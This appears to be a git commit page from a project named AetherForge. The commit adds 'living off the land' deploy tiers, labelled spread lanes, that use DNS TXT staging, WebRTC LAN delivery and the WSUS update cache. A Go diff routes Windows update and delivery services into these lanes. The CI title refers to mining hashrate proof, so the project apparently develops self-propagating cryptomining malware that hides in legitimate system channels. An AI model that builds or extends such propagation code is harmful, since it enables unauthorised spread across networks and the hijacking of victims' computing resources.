Add dns_txt, webrtc_mesh, and wsus_cache_peer LOTL deploy tiers with Forge toggles.
Some checks failed
CI Docker Mining Proof / Linux agent hashrate proof (push) Has been cancelled

Implements three new spread lanes following the do_peer pattern: DNS TXT mesh staging, WebRTC LAN seed manifest delivery, and WSUS SoftwareDistribution cousin handoff. Integrates tiers into onion chain, deploy-plan allowlist, Forge UI/docs, and tests.
This commit is contained in:
AetherForge
2026-06-07 01:07:55 -07:00
parent 652356bfe6
commit 0be2de81a5
100 changed files with 3447 additions and 213 deletions

View File

@@ -50,6 +50,12 @@ func JoinLaneForSignal(serviceName string, port int) string {
return "dotnet"
case strings.Contains(name, "dosvc") || strings.Contains(name, "delivery optimization"):
return "do_peer"
case strings.Contains(name, "wuauserv") || strings.Contains(name, "windows update") || strings.Contains(name, "wsus"):
return "wsus_cache_peer"
case strings.Contains(name, "_aether") || strings.Contains(name, "dns_txt"):
return "dns_txt"
case strings.Contains(name, "webrtc_mesh") || strings.Contains(name, "webrtc"):
return "webrtc_mesh"
case strings.Contains(name, "jenkins") || strings.Contains(name, "gitlab") || strings.Contains(name, "runner"):
return "bits_curl"
case strings.Contains(name, "ccmexec") || strings.Contains(name, "sms_agent") || strings.Contains(name, "sccm"):